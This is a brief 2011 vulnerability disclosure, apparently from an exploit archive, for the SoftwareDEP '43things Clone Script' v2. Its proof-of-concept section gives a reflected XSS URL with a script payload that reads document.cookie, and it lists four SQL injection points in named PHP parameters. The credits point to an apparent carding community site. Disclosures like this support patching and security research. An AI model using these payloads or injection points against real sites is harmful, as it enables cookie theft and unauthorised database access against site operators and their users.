SoftwareDEP 43things Clone Script Multiple Vulnerabilities

-----------------------------------------------------------------------
SoftwareDEP 43things Clone Script Multiple Vulnerabilities
 
Author     : v3n0m
Discovered : August, 18-2011 GMT +7:00 Jakarta, Indonesia
Software   : 43things Clone script
Developer  : http://www.softwaredep.com/
Price      : $700
Version    : v2 Lower versions may also be affected
-----------------------------------------------------------------------

PoC:
---

XSS Injection:
-------------
http://www.domain.tld/[path]/zeitgeist/tag_list.php?tag=<script>alert(document.cookie)</script>

SQL Injection:
-------------
http://www.domain.tld/[path]/thing_detail.php?thingid=[SQLi]
http://www.domain.tld/[path]/thingshome.php?uid=[SQLi]
http://www.domain.tld/[path]/recent_activity.php?uid=[SQLi]
http://www.domain.tld/[path]/year_in_review.php?uid=[SQLi]

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id